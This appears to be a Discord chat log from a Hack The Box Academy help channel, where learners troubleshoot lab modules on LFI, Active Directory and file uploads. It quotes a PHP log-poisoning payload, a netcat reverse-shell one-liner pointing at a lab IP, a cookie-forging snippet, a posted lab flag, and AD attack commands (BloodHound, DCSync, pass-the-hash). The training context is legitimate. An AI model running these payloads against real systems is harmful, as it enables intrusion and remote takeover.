#modules

1 messages ยท Page 26 of 1

frigid monolith
#

Expert tip

rustic sage
#

im making it send user agent as '<?php system("id"); ?>' and it wont work

thorn urchin
#

Agreed because Ive stolen that tip from experts.

rustic sage
#

but it works when i make it send 'poisoning'

thorn urchin
#

ยฏ_(ใƒ„)_/ยฏ

#

worked for me

rustic sage
#

it returns this

/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=id HTTP/1.1" 200 2235 "-" "'

#

but when I do 'poisoning' it returns

/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log HTTP/1.1" 200 2217 "-" "'poisoning'"

thorn urchin
#

yeah thats the issue I was having when I tried with curl

#

but it Just Worked^tm for me in burp

pastel ginkgo
#

good lord ran nmap on the next host after the inital host of AD and it took 15 mins to finish

thorn urchin
#

oh just remembered

#

you can load the error.log as well, and itll have if there was any issues with your php code

#

because your php errors will get logged there if something went wrong.

#

will note that typically if anything went wrong with my injection there I had to reset the box. Which is why Im annoyed that log injection seems to be the only route, cause it demands perfect payload or else you brick the vector.

#

but also true to life

#

The first irl LFI I found I bricked it, so oops.

rustic sage
#

like th one where its '<?php system("id"); ?>'

thorn urchin
#

try again with $_get version but reset the box first to clear all the logs. If it doesnt work, load the error.log and see what it says

rustic sage
#

k

pastel ginkgo
#

hazah got the sql users remote workstation flag with 5 mins left

#

I made it way harder on myself.

#

like way harder

thorn urchin
#

that was the general impression I got lol

rustic sage
#

its a bit messy in error log ill just reset the box rq (didnt make it clean)

thorn urchin
#

honestly my biggest take away from the skill assessments for those was to not get too picky about my preferred methods. I got hung up on one of the sections because my preferred way didnt grab the info I needed. and also the module recommended way for one section had very little info on actually doing it and I had a hard time getting it work till I realized a popular different tool already had it baked in.

thorn urchin
rustic sage
#

i sent a '<?php system("id"); ?>' agent head from burp to it

#

and in the error log there was more stuff but nothing useful

thorn urchin
#

what did it say

rustic sage
thorn urchin
#

that looks like just an error from loading the full page

#

are you using the repeater method I mentioned?

rustic sage
#

oh

#

i forgot i left it on

#

ok gonna try again

thorn urchin
#

yeah I leave it on just long enough to capture the first index.php request and then send it to repeater

rustic sage
#

the new error log hackthebox server wont let me send because it tells me dont send the same thing over over again

#

can i dm it to you

prisma cairn
#

Hi, what are the ranks on htb, where can we see the list of all the ranks please

thorn urchin
#

sure

rustic sage
#

Good evening! In the live engagement (shells and payloads) How can I use an exploit from exploitdb in the msfconsole! I get a permission denied error when typing "updatedb"

frigid monolith
#

Sudo

pastel ginkgo
#

@thorn urchin I know you mentioned Dante its 95 dollars off atm

thorn urchin
#

oh snap

#

I dont see a discount for it

forest tapir
#

Is Pass the Ticket target borked for anyone else?

pastel ginkgo
#

@thorn urchin sent the coupon code in a dm, looks like it covers the 1 time setup fee

forest tapir
#

Can't even ping that man. Not sure why.

surreal edge
#

Is there any one on one help a person can get for beginers. Im going through the readings but im having trouble naiagating and using the boxes.

frigid monolith
#

There's a problem with the pwnboxes

#

Said support

forest tapir
#

is that it?

thorn urchin
frigid monolith
#

I was having an issue

forest tapir
#

alright, vm it is. Thank you sirs

frigid monolith
#

Np

#

Bah VMware expired

covert latch
#

Heyo. I just read last posts. I have really hard times finishing Nibbles on Getting started. I get to the point when I generate host, and I'm about to upload PHP to my_images to create reverse shell. But then nothing changes in my_images. Netcat doesn't open any shell. And those servers keep falling down.

pastel ginkgo
#

Wrong section

covert latch
#

Oh sorry.

surreal edge
#

ok

pastel ginkgo
#

np lots of folks end up in this chat

thorn urchin
#

but unfortunately I remember nothing from that box so idr

pastel ginkgo
#

ooo I was thinking the getting started on the main site

#

I think it might be on both

thorn urchin
#

nibbles isna retired box

#

but also used for that module

covert latch
#

There is a problem that even if I follow it step by step, nothing works. Even when I tried to use metasploit to get around, even some other php revershell scripts nothing works for me

#

And those generated hosts fall down after 15 minutes

#

And in pwnbox they didn't worked at all

#

So I was wondering if HTB has some issues

thorn urchin
#

this been an ongoing issue or just today issue

#

cause HTB def having some issues today

covert latch
#

I started it yesterday. But there I think worked well. And today I can't get through.

thorn urchin
#

yeah it might just be todays issues messing with ya

#

Id take a break and check in after a couple hours or tomorrow

covert latch
#

Oki! Also I was wondering. does .php file has to be named image.php? Because when I was trying to upload shell.php it didn't show there on list of files. If anyone knows?

thorn urchin
#

web apps can vary but name should largely be unimportant outside of the extension

covert latch
#

Okay thank you. Then it might be connected to todays issue they didn't upload.

pastel ginkgo
#

Yeah Im having issues with the AD skills assessment 1 now that ive came back tried uploading chisel and it died

thorn urchin
#

yeah everyone just go touch grass for a bit ๐Ÿ˜‚

covert latch
#

It would be strange, it's pitch dark outside ๐Ÿ˜„

thorn urchin
#

night walks are the best

flat oxide
#

I have the same problem, can I dm you ?

vital adder
#

sure

mellow turtle
#

@pastel ginkgo use metasploit

pastel ginkgo
#

For?

mellow turtle
#

pivoting

#

without issues

pastel ginkgo
#

I used chisel it worked perfectly

mellow turtle
#

oh then i misunderstood

pastel ginkgo
#

now im just trying to figure out how to get tools located on the machine now

queen hatch
#

Will anyone help with nudge in the right direction for Broken Auth: Skills Assessment?

I've found a user and a couple of cookies. I haven't been successfully decoded the cookies. Looks like they end up being ||MD5|| and I hit a wall.

mellow turtle
#

||echo(base64_encode(md5('USER')) . 6 . base64_encode(md5('ROL')));||

#

@queen hatch

#

u dont have to decode

#

u have to try to cook one

#

thats what i have done

queen hatch
#

I figured decode to view the contents and work your way back up

#

Otherwise, I'd be guessing contents. But that makes sense. Ty!

coarse mango
#

Can anyone help me with 'Introduction to Bash Scripting : Flow Control - Branches' ? im not sure why the number i get for the salt is incorrect

pastel ginkgo
#

idk why but I cant run any power view commands

tidal mango
pastel ginkgo
#

Yup

pastel ginkgo
#

@thorn urchin Where did you get your PowerView from? I can't get any powerview thing to work at all.

thorn urchin
#

I didnt use powerview

pastel ginkgo
#

How did you get bloodhound working then?

#

I got it on the remote system but it wants a database thing

knotty blade
#

hello hackers a lil guidance please.....Footprinting Hard Lab and I'm trying this command: "ssh -i private.key tom@10.129.53.210" with the key found in the imap server. But I got this error: 'Load key "private.key": error in libcrypto
tom@10.129.53.210: Permission denied (publickey). permissions have been changed. it worked on the easy lab, i dmissed something?

rustic sage
#

sounds like the key changed

knotty blade
#

do i have to retrieve the email with key everytime i get a new ip from htb?

rustic sage
#

uhh im very basic noob level but doesnt ssh need to generate the public key pair everytime, your private key may be the same and should be, but the public key is mutually negotiated using the private keys of the things trying to talk to eachother

#

actually the private key would change if its generating a session based key i think i dunno

#

not sure why an imap server would be storing a private key though thats some bad juju

tidal mango
vivid nova
#

I need some help on cracking miscellaneous files and hashes. Anyone got me?

pastel ginkgo
#

The skills assessment and I haven't yet

tidal mango
knotty blade
#

i used mousepad which worked on the easy lab?

rustic sage
#

i havent done the module or any module actually so kek

knotty blade
#

still get same error public key

tidal mango
knotty blade
#

yes to private specs

knotty blade
knotty blade
rustic sage
#

nice

knotty blade
#

thanks for the help!!

pastel ginkgo
tidal mango
# pastel ginkgo Ad Enumeration

Well.... I'll be asking you these question then! lol, I have not got that far yet... I have 5 more sections before I get to the skills assessment.

pastel ginkgo
#

Yeah its a beast of the module the skill assment is pretty tough but doable im just stuck atm because I can't get powerview or bloodhound to play nice

thorn urchin
pastel ginkgo
#

Yeah I was getting stuck at bloodhounds login screen

pastel ginkgo
#

@thorn urchin How did you get it to run over the proxy? Im getting errors saying it cant resolve the domain controller name even though its set in my host file

ripe terrace
#

Having a bit of trouble with the question on https://academy.hackthebox.com/module/41/section/441 โ€” seeing as this is the first section of the module, and we haven't been technically taught to deobfuscate JS code yet, I would naturally assume that the plaintext flag I can see in the obfuscated JS code is what I should be submitting to pass the question. However, it's balking at me that it's incorrect. The answer I'm providing is ||HTB{1_4m_7h3_53r14l_g3n3r470r}|| โ€” am I missing something (non)obvious here?

Edit: Solved ๐Ÿ™‚

thorn urchin
pastel ginkgo
#

yeah ive been trying || proxychains bloodhound-python -d INLANEFREIGHT.LOCAL -dc DC01.INLANEFREIGHT.LOCAL -c All -u xxxx -p xxxx ||

thorn urchin
#

hmmm idr but try specifying the IP address for -dc

pastel ginkgo
#

requires fqdn rip

#

lol

#

idk why lookup is failing

#

im about to go into my pihole server and set it there

thorn urchin
#

oof yeah idr

pastel ginkgo
#

yeah its not that

#

idk why its not working

thorn urchin
#

ah here we go

#

try --nameserver and setting it to the DC ip

#

and maybe tack on --dns-tcp for good measure

pastel ginkgo
#

your amazing

#

adding the tcp got it working

#

so entire command + nameserver and dns tcp

thorn urchin
#

sounds about right

pastel ginkgo
#

if it ran udp it timed out

#

I guessed right what type of attack the could preform

wheat garden
#

lol its microsoft everything has spyware and malware looool

pastel ginkgo
#

that guy came back?

#

or you just really really scroll up?

thorn urchin
#

no, hes just replying to a really old message lol

pastel ginkgo
#

ah he's out here grave digging

wheat garden
#

uh ya I just logged back on so thats actually where my chat history left off and started me at

languid bloom
#

hmmmm

fallow ginkgo
#

Could someone give me a hint to make the password mutation challenge complete a bit faster?

I let the original ask (use the resources.zip to create the mutated password.list file) run for 2ish hours with no luck, and am now attempting the challenge with the example list from the guide.

pastel ginkgo
#

Break it into chucks || and start in the B's ||

rustic sage
#

Bro i need a teacher on HTB

#

i swear its pretty hard

#

but im in for it i baught the platinum since it comes with a 1000 cubes with the deal

fallow ginkgo
pastel ginkgo
#

You can break it into chunks using grep if I remember correctly

rustic sage
pastel ginkgo
#

up to you and how interested you are in the subject

rustic sage
#

gotcha but reading it is a bit hard i wish it was a bit simple

thorn urchin
rustic sage
thorn urchin
#

Well youll need to either fix that or get a diagnosis and some meds to help with that

rustic sage
#

woah meds

thorn urchin
#

otherwise itll be very hard to survive in this field

rustic sage
#

i see what you mean

thorn urchin
#

drug talk is banned from this server

rustic sage
#

oh

#

so no drugs sorry mod

thorn urchin
#

but I can attest that wont be helpful either

wheat garden
#

but ya focus for significant lengths of times is absolute necesity

rustic sage
#

bro i just watched breaking bad its on my mind

thorn urchin
#

I aint a mod, I got temp banned for talking about drugs so ๐Ÿ˜‚

#

they take it seriously

wheat garden
#

get off the processed foods/ fast foods, drugs, and porn and eat lots of homegrown fruits veggies and meat. Then youll be able to focus

rustic sage
wheat garden
pastel ginkgo
#

@thorn urchin Im lost, I did the dc sync I got the administrators hash but I cant crack it.

rustic sage
thorn urchin
wheat garden
thorn urchin
#

once you have dcsync theres usually not much enumeration left ๐Ÿ˜›

pastel ginkgo
#

you cant kerbroast without the password of the user

#

trying to brain storm it but im stuck again lol

wheat garden
#

and kerbroast sounds tasty is it seasoned with garlic and other herbs?

thorn urchin
#

Hash as good as password was a hint ๐Ÿ˜‰

pastel ginkgo
#

ok I finally got it

#

idk why but after doing pth I wasnt able to access the remote site with cd \dc01.inlanefreight.htb\c$

#

but I was able to do net use x: \dc01.inlanefreight.local

#

and drill down from there to the flag

thorn urchin
#

hey whatever works

wheat garden
#

get r done

pastel ginkgo
#

im going to ask you tomorrow on how you got it working so I can add it to my notes lol

#

im rushing to take screen shots before my box goes down atm lol

#

Got to say that assessment was brutal but shit I learned alot

fallow ginkgo
#

I can't get this damned password mutation challenge done with.
The box keeps timing out causing me to have to reset it.

I'm sure I'm doing something wrong.
I'm currently following what @pastel ginkgo suggested but I still can't even get through one .list file before the box expires.

#

HTB should give the option like THM to add more time to the box instead of just the option to reset it.

wheat garden
#

ive notticed though that if you keep active on the box even when time runs out it will still remain active for a longtime.

fallow ginkgo
wheat garden
thorn urchin
#

if nobody resets it then they stay as they are. unless you have vip and get private instances

fallow ginkgo
wheat garden
thorn urchin
#

also if youre trying against ssh youre gunna have a bad time, even though thats what it tells ya to do.

fallow ginkgo
#

I suppose I should be able to run the same attack against SMB ๐Ÿ˜›

thorn urchin
#

๐Ÿ™‚

wheat garden
abstract fjord
#

is there anyone can help on the question "Predictable Reset Token"?

thorn urchin
#

its not tough, its just annoying and wastes your time

fallow ginkgo
thorn urchin
#

its the worse module in the whole course so far

wheat garden
#

-t 64 for the win!

wheat garden
thorn urchin
#

eh not really

fallow ginkgo
thorn urchin
#

just not really how youd go about things in the real world most of the time

#

the mutations thing a bit, but not that extreme except for offline cracking, theres better targeted wordlist methods if you really wanna go that route(that lightly is covered in a different module), password spraying methods are far more common.

#

the file and hash cracking stuff is a bit more common, but a little lite in the module imo

wheat garden
#

just download some leet passwordlist from some other experienced hacker

thorn urchin
#

the pass the hash and pass the ticket sections that got recently added are thr most valuable parts of the whole module

#

def have those notes good cause youll use em in the AD module for sure

fresh reef
#

Feeling kinda dumb: On Using the Metasploit Framework :Sessions ...ive run nmap in so many configurations including different firewall and IDS evasion techniques ...and im going a bit wild. the web server isnt being run on the common ports and im stark out of ideas that dont take a 24hr long nmap scan that i cant do due to target time limit. lol pls hlp

inner cave
#

Hi, I am stuck at the last question on AD skills assessment 1. I got tp***y user and password hash and administrator hash. How did you get access to dc01? I tried pth on mimikatz did not work . Could someone gimme a hint?

tidal mango
#

I think I have been at this too long today.... Is there a way to get a NTLM hash in powershell without using tools like mimikatz or powerview etc? I got the answer to the module I am working on (attacking domain Trusts child -> Parent Trusts from linux) using linux, but the question's wording makes me think I should be doing it from the shell I got on the DC in powershell...

abstract fjord
sly tapir
quasi wave
#

do you recommend any other subscription services to go with HTB Academy? Is TryHackMe the only one I can add in? I don't think TryHackMe is good for learning is why I'm asking because it really seems like you learn a topic and never use it again on THM

#

is there a good reason to do both HTB Academy and THM at same time?

#

what is another place I can go to that is similar to complement HTB Academy?

rustic sage
#

now how tf do i do this shit

lucid mirage
quasi wave
#

Iโ€™m thinking to reinforce fundamentals

lucid mirage
quasi wave
#

Ok

#

Would learning Python be better?

#

To do concurrently?

#

Or earning CompTIA certs?

lucid mirage
#

as for academy, there's only 2 or 3 modules left, cuz i think it's kinda expensive for the cubes.

quasi wave
#

Ok

ionic snow
#

which path or module in htb teaches how to hack?

#

i just started it

quasi wave
#

I have a student subscription to Academy

#

Both job role paths teach how to hack

ionic snow
#

welp i dont have those many cubes

#

how to earn em

quasi wave
#

But CPTS job role path is preferably done after information security fundamentals path

ionic snow
lucid mirage
#

I have a programming background, so I would definitely suggest you learn python.

lucid mirage
ionic snow
#

ah fck

sly tapir
#

i found it cheaper to buy the sub

ionic snow
#

cant we do it without

#

buying

#

?

lucid mirage
#

you can;t unlock tier3\4 modules with subscription.

sly tapir
#

ohh your talking about non-academy stuff

ionic snow
#

how to get more cubes without buyiung em

lucid mirage
#

you cant

thorn urchin
#

The tier 0 modules only cost 10 cubes and refund 10 cubes on completion, a fresh academy account gives you 10 cubes. So theres a number of modules you can do for free so long as you actually finish em.

quasi wave
#

So what would be a good complement to HTB Academy while learning? Python?

#

I was gonna pick between TryHackMe in addition to HTB Academy or do HTB Academy and Python on side

#

What do you think?

#

Iโ€™m starting to think HTB Academy and Python is good enough?

loud sapphire
broken saffron
#

Hello can I dm someone for broken authentication->brute forcing passwords? I have a couple of days stuck in that section thanks!

covert latch
#

Module: Getting started
Part: Initial foothold
Problem: Can't open reverse shell.

Greetings again. Server is now working well, but I have diferent problem. I will keep it short. I can login to Nibbleblog. but problem is that if I upload anything else named then image.php it doesn't show on /content/private/plugins/my_image dir. And if I upload image.php file it changes but when I try curl or open file through firefox it won't open reverse shell on my netcat. It just processes and then nothing. I'm stuck on this and I do not know what to do else. I read here in history some poeple had similar issues, were there some solutions to them?

#

I tried PWN box thinking that there might be problem with my system, that it might block reverseshell but when I try open generated website in pwnbox it say connection has timed out in browser.

placid quest
#

@covert latch maybe u did not set the reverse shell in the correct way

covert latch
#

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 9443 >/tmp/f"); ?>

#

I have ti copy pasta in image.php file

#

From HTB

#

nc is listening on 9443

#

but I tried to put verbose on curl now and it says this

#
  • Trying 10.129.162.210:80...
  • Connected to 10.129.162.210 (10.129.162.210) port 80 (#0)

GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1
Host: 10.129.162.210
User-Agent: curl/7.85.0
Accept: /

  • Mark bundle as not supporting multiuse
    < HTTP/1.1 200 OK
    < Date: Fri, 02 Dec 2022 08:53:23 GMT
    < Server: Apache/2.4.18 (Ubuntu)
    < Content-Length: 0
    < Content-Type: text/html; charset=UTF-8
    <
  • Connection #0 to host 10.129.162.210 left intact
placid quest
#

@covert latch try to create a php reverse shell

covert latch
#

I thought it is that one on top. That code which is put in .php file and then upload to images

placid quest
#

No

covert latch
#

Oh? I thought it was ๐Ÿ˜ณ

solar granite
abstract fjord
#

anyone can help on Q2 of Predictable Reset Token?

brisk geode
#

heres the qus

#

i did everything correctly but i got no flags

vital adder
# brisk geode heres the qus

for that one zap stuff was so bad i wasn't able to do that in zap (just give it a try and it work this time but burp is still better) burp is so much better for that so use also there is only 17 username in the username wordlist so you can try it manually for sanity check

vital adder
kind vessel
#

Hello I try to connect via pwnbox on spawned machine. I wait for 10 minutes and the spawned machine is no up. No scannable. Anyone have this problem ?

vital adder
#

which module are you on? it i think i have the same issue on the Attacking Enterprise Networks module

bitter wraith
#

Hey guys, I'm having problems with the question on File Upload Attacks - Blacklist Filters. Could someone help? Thanks ๐Ÿ˜„

vital adder
#

sure what's the issue?

bitter wraith
#

I'm running burp with an extension wordlist to check on which ones are allowed and which aren't, the problem is all of them are reporting a 200 reply

#

When I try to upload them I am met with an error

winged roost
#

I think there is an on-going issue with academy modules of where connecting via ssh just isnt happening. its just holding. - currently i am on the Active Directory Enum stage

bitter wraith
vital adder
vital adder
bitter wraith
bitter wraith
vital adder
abstract fjord
#

anyone can help on Q2 of Predictable Reset Token?

winged roost
vital adder
winged roost
vital adder
#

all of the one that have docker target seem to be working fine

vital adder
vital adder
#

oh

winged roost
bitter wraith
vital adder
vital adder
kind vessel
vital adder
abstract fjord
vital adder
#

hint change the ||role||

winged roost
vital adder
#

same ๐Ÿคฃ

winged roost
#

back to the drawing board then i guess

rustic sage
#

Hihi!

#

Hope everyone is having a wonderful day : D

kind vessel
winged roost
#

im going to attempt a reset again

abstract fjord
#

@vital adder can i DM you?

vital adder
#

sure

knotty zenith
#

@distant oar can I dm?

sharp stump
rotund umbra
#

hi i am new

#

@sharp stumphi

broken warren
#

Can someone help me out with windows priv esc module? In the SeDebug privilege section. The exercise says navigate to computer settings > windows settings > security settings, but neither my host or remote windows boxes have those options. I mean I have settings > windows & security but nothing in their looks like what's in the example.

peak basin
#

can anyone tell me how to use http proxy injector

#

?

vital adder
#

the Forgot box? ask that in #boxes

kind vessel
frigid vector
vital adder
#

no worries ๐Ÿ‘

vital adder
vital adder
lucid bloom
fierce pond
#

i need some help understanding something in the Nmap module IDS/IPS evasion

#

so im trying to scan the target using a different Ip source , with the -S flag , and specifying the interface to tun0 , but the result is weird , the nmap reply with failed to determine route to target ! , i looked into the "routing table" and it seems everything is ok , looked into the nmap official docs and nothing checks out , so whoever has some knowledge in this please help

quasi moth
#

Hello, can somebody help me with Command Injection Skills Assessment, I have found the HTB forum, but it doesn't really help. Can you write to DM, I'll send to you my screenshots

queen hatch
#

~~Can I get a hint for Broken Auth Skill Assessment?

I'm stuck with error ||User support cannot have requested role||. Not sure where to go from here. I'm also not sure if I should know what to do with ||htb_sessid_persistent|| yet.~~

Hint: Figured out country code. I'm able to move forward again.

swift osprey
#

Hello, Can someone help me to find What is admin email address in IMAP/POP23 in foot-printing module?

rustic sage
loud sapphire
#

Hello,
Any issues with the platform at the moment? Network connectivity mainly.

rustic sage
loud sapphire
rustic sage
loud sapphire
#

k

quasi moth
#

Hello, can somebody help me with Command Injection Skills Assessment, I have found the HTB forum, but it doesn't really help. Can you write to DM, I'll send to you my screenshots

solar granite
#

Anyway, the issue is that you're not injecting any command really. Your command just comes as text after the argument

quasi moth
solar granite
#

You need to separate it into 2 commands

fierce pond
#

@solar granite hey man, do you have any idea why the -S command cannot work in my case ?

solar granite
abstract fjord
#

is there someone can DM about "Work on webapp at URL /question2/ and try to bypass the login form using one of the method showed. What is the flag? " under weak bruteforce protection > insecure protection

quasi moth
solar granite
quasi moth
solar granite
solar granite
# fierce pond .

Does it work without the -S? I just tried and -S ... -e tun0 works fine for me

fierce pond
#

all nmap flags are working without this tiny monster , but if you tried it on academy boxes i guess i cant complain

solar granite
#

I'm not very familiar with how -S works exactly, but I tested previously with a known IP on my network

#

I just did a test again with the same IP you used (10.129.2.200) and I got the same failed to determine route to 127.0.0.1 error

#

I'd guess the spoofed IP needs to have a route to the target IP

fierce pond
#

anyway thanks for the effort man ! really appreciate it

steep crown
#

Thank you, I just wasted an hour trying to enumerate the version, lifesaver

limpid raft
#

anyone experiencing problems with starting an instance?

#

when i try to start one it won't work and i get the error 'request validation failed' : /

drowsy narwhal
#

you connected on OpenVPN?

limpid raft
#

no

drowsy narwhal
limpid raft
#

But I don't need to connect to openvpn to start an instance in the webinterface? It worked before.

#

I think that's the point of spawning an instance in the browser?

drowsy narwhal
#

are you VIP?

limpid raft
#

Student license

swift osprey
#

@limpid raft you can try clearing cache and data?

limpid raft
#

Oh that worked, weird. Thanks!

fierce pond
#

so i been stuck on module Nmap , Section IDS/IPS evasion "Firewall bypass" for 6 hours , and cant get the answer right , i was reading alot in the nmap site so that's why , anyway something in the module is not really explained well and nmap site didn't speak much of it , im stuck since long time now and i need help i get response from the target using other method to bypass but the answer is still wrong ๐Ÿ™‚ .......

#

its working with a decoy , but the OS detection is probably wrong cause the answer is wrong and the other example just like i discussed with @solar granite is not working because of some issue with the routing "and i cant figure that out even if i tried to add something to the routing table i dont know what it should be because the -S Flag itself not well explained ! "

thorn urchin
#

now spoofing the source port can be helpful, but not the source address

#

Decoys were used back in the day for plausible deniability when scanning wasnt as common and thus more scrutinized as well as a lack of easy access to VPS and proxy hosts to mask the origin of the scan. So the decoy option was useful to throw up a bunch of noise that made it harder to pinpoint the attacker. Nowadays its kinda pointless and doesnt do much for firewall or ids evasion. Its a relic of the 90s when it was implemented. It honestly shouldnt even be taught anymore.

fierce pond
thorn urchin
#

you can always go slower ๐Ÿ™‚

fast tree
#

Please i need help with introducciรณn nosqlinjectiom

fierce pond
#

well im waiting for the scan to finish im using the -mtu 16 option , the -f is too slow !

thorn urchin
#

you can adjust the raw rate

echo agate
#

why do i have this shitty username

fierce pond
#

it was Faster ! not much detectable for the machine i was trying on , but the results still the same , no OS detection

fierce pond
thorn urchin
#

@fierce pond which section are you on btw?

#

the firewall/ids evasion section doesnt have a practical section, and then there are three labs, Easy, Medium, and Hard

rustic sage
#

Good evening! Im having trouble with the live engagement labs :( :( I cant manage to use the exploitdb module in the msfconsole ๐Ÿ˜ฆ ๐Ÿ˜ฆ ๐Ÿ˜ฆ

fierce pond
#

it got me crazy so i didn't pass it , i thought i might learn stuff while doing so ... but it has been a long time and i cant figure it out !

thorn urchin
#

youre super overthinking it then

#

script scan can get it no evasion necessary

#

it doesnt want the exact os version, it just wants the distro name

rustic sage
thorn urchin
#

if its any consolation the medium and hard labs should go a bit easier for you since they do require a bit more of the overthinking youve been trying

fierce pond
thorn urchin
#

np

thorn urchin
#

also random note to whoever needs it in the file uploads module: their recommended route of burp intruder is dumb, recall your lessons from the ffuf module and use that instead. Save the request file and fuzz for your extensions and what not.

especially nice in the parts where you have many valid uploadable extensions, but only one of them will actually execute code. Itll want you to go by them one by one but thats stupid. If you fuzz the upload with ffuf and your payload, then you can turn around and do a similar fuzz on the url param with your cmd=id or whatever and fuzz the same extension at the file upload location, which will make the correct upload that executes code stand out.

its a MUCH saner approach than whats taught in the module and more comprehensive to boot.

#

so youll have a bunch of shell.php3, shell.php4, ect uploaded and then youre cycling through them when testing which one is the one you need for the challenge too instead of doing it by hand like a monkey.

rustic sage
#

Hello i have the same problem how did you solve it

#

Edit:solved

sage granite
thorn urchin
#

which is covered in the ffuf module

sage granite
#

I didn't do that module yet

#

Can you use FUZZ variable in the file with entire request?

thorn urchin
#

yes

#

not gunna say my way is always the best way, but if you dont have burp pro, it will be better than using burp intruder every time always.

pastel ginkgo
#

Madf0x you and MrTom are the unofficial heroes of this chat lol

thorn urchin
#

thanks ๐Ÿ™‚

#

at the very least the takeaway is dont be afraid of trying a better method you know just because its not whats taught, especially if its something you HAVE been taught in a previous module because it might be fair game or even expected in the final assessment

quaint hollow
#

Hey guys, having a bit of trouble wit Shoppy after the initial foothold, anyone can give me a nudge please?

rustic sage
low vine
#

Man hate asking for help on this one but struggling a bit in the FFUF module (BRB 1 sec then ill finish)

thorn urchin
#

well I was just preaching ffuf

low vine
#

Haha yea I've read through it a coupel times and i've got to be missing something really small

pastel ginkgo
#

@thorn urchin Did you ever get this error after building chisel on your linux box? I didnt get this yesterday with my windows build

thorn urchin
#

I used the pre installed chisel for my Linux side of things, and only the built one for the windows stuff

low vine
#

okay so on page fuzzing our goal is to find the /blog pages etc etc.

I've tried
ffuf -w /wordlist -u <ip>/blogFUZZ
I've also tried <ip/blog/FUZZ as well as <ip>/blog/Fuzz_1.Fuzz2

#

I've found a 403 .phps for extension but have not found anything else with FFUF

thorn urchin
#

so you want something more like /blog/indexFUZZ assuming youre using thr web extensions wordlist

low vine
#

ahh I did not try that

thorn urchin
#

then when you find out what ones are accepted you can swap things around

low vine
#

I see that now just passed the Fuzz_1.Fuzz_2

thorn urchin
#

and do a /blog/FUZZ.ext while feedining it the common directories and files wordlist

#

you can do it both ways with FUZZ1.FUZZ2 but itll take awhile as itll do every combination of both and you have to specify the two wordlists with the correct identifiers.

low vine
#

lol

#

Okay let me work with this a bit ty

#

I was on right track just neede to try a little more

thorn urchin
#

the web extensions one also adds a period too iirc, in which case youd actually want FUZZ1FUZZ2 or else youll get results like blah..php which some webservers are okay with some arent

low vine
#

@thorn urchin gonna pm for clarification

pastel ginkgo
#

Im starting to see why @thorn urchin it took you so long to do the 2nd skills assessment I havent even found any users hash yet lol

#

I was able to enumerate some users but nothing else lol

thorn urchin
#

assessment 1 is just a warm up, assessment 2 is the real test

pastel ginkgo
#

oof

thorn urchin
#

start with the very very basics

#

every pentesters favorite first tools to run once on an internal network.

pastel ginkgo
simple zephyr
#

i have having trouble with the MSSQL queries for footprinting medium can some one give me a hint or make sure im on the right track.

bitter comet
#

is there a way to reset module progress?

rustic sage
#

or are you already past login and trying to execute queries

simple zephyr
#

no im going through hacktricks MSSQL commands to query the db but stuck

rustic sage
#

I'll dm because I don't want to give away spoilers

pastel ginkgo
#

@thorn urchin is it something really simple to get the first user hash?

thorn urchin
#

yeah

#

it does take a few minutes though

pastel ginkgo
#

I've tried nmap, various forms of smb stuff, responder variants

thorn urchin
#

why responder variants

pastel ginkgo
#

like I ran responder for almost 45 mins

#

I tried the tcp dump as well as responder

thorn urchin
#

responder from the foothold right?

pastel ginkgo
#

yup

#

on the 172 port

thorn urchin
#

sure ya didnt just miss the results?

pastel ginkgo
#

yeah I legit ran it for 45 mins came back and didnt get anything

#

maybe module bugged

thorn urchin
#

odd

pastel ginkgo
#

like responder was legit my first idea

#

ran it then made another window to do nmap scans

thorn urchin
#

cause def took awhile but 45 minutes is a little long

pastel ginkgo
#

i'll reset it and try again

#

my metasploit book just got here in the mail

#

give it a read while I wait

#

@thorn urchin just got the hash, it was bugged

thorn urchin
#

๐Ÿ‘

swift osprey
#

For the Footprint module , ms SQL Iโ€™m getting this error

#

Is there any other way to login mssql

#

This error for mssql-cli command

thorn urchin
#

sounds like you either have some old packages or some borked python libs

#

i.e not a tool issue, your kali VM is having issues

swift osprey
#

Any other way to fix it ? I donโ€™t wanna change my VM, I made everything installed for CREST CRT ๐Ÿ˜…

thorn urchin
#

load the clean VM snapshot you should totally still have right and then try to update it and run from that forked instance

swift osprey
#

Will check that

thorn urchin
#

otherwise update all packages and try reinstalling impacket from scratch

#

with a venv

swift osprey
#

Yup , I remove python aswell

vital adder
# thorn urchin also random note to whoever needs it in the file uploads module: their recommend...

i both agree and disagree with this yes burp community intruder is kinda useless without being able to filter but if you only get one hit or only need to test one thing then i would say burp is a bit better (but this is the repeater) but if you get multiple hit and need to test multiple thing all at once then ffuf is 100% better also was you able to get ffuf work for this? if you did pls send me the command i was only able to get it work with curl and a bash loop

thorn urchin
#

and Im still at work, remind me in 3 hours and I ought to be able to send over my steps

thorn urchin
low vine
#

So I've ben subscribed to HTB academy for last 10 ish months and it seems like i've just been kicked out?

#

'How can I see what happened / why?

thorn urchin
#

contact support?

low vine
#

Yea will do is there a help channel here or I guess email

vital adder
vital adder
thorn urchin
#

otherwise you just get errors for each result

vital adder
#

oh i just use the -u for the url the -request is kinda weird for me

thorn urchin
#

yeah not using -request would be a nightmare to setup

vital adder
#

oh

#

ohhhh that's for loading from a file

#

why tf didn't i think of that i'm dumb

thorn urchin
#

cause using a request file means all the headers and post parameters are all gunna be filled out exactly the same way burp repeater does it, you just modify what you want and plug FUZZ where you want ffuf to do its thing

#

I used -u for when I was testing the actual shell commands after the uploads, but for the upload itself, I used a request file

vital adder
#

make sense

thorn urchin
#

Not finished with the module yet, but I suspect the approach will work for the majority if not all of the following sections I havnt done yet

low vine
#

So odd i was on student subscription and literally died/ got kicked out lol

#

Side question, Silver Annual Plan seems to only unlock up to lvl 2, is there a version of that that gives access to higher level modules? Or do I just have to buy all of thos individually?

rustic sage
#

what you see is what you can get๐Ÿ˜‚

#

so basically Silver Annual and Student give you up to (including) Tier II which I think are the best deals. Especially if you can afford the Silver Annual because it comes with exam attempts

low vine
#

Yea I was just on student and then it was seemingly just removed

rustic sage
#

Tier III, IV, and V you'll need to buy cubes individually or use the ones you earn from completing Tiers 0, I, and II

rustic sage
low vine
#

Yea i was just doing modules and it unsubscribed etc

#

not sure what happened

rustic sage
#

I mean was today the end of your subscription

low vine
#

Does student only have like a certain timeline?

#

I think ive been subscribed 9/10 months?

#

idk

#

but sadly only recently started using a bunch

rustic sage
#

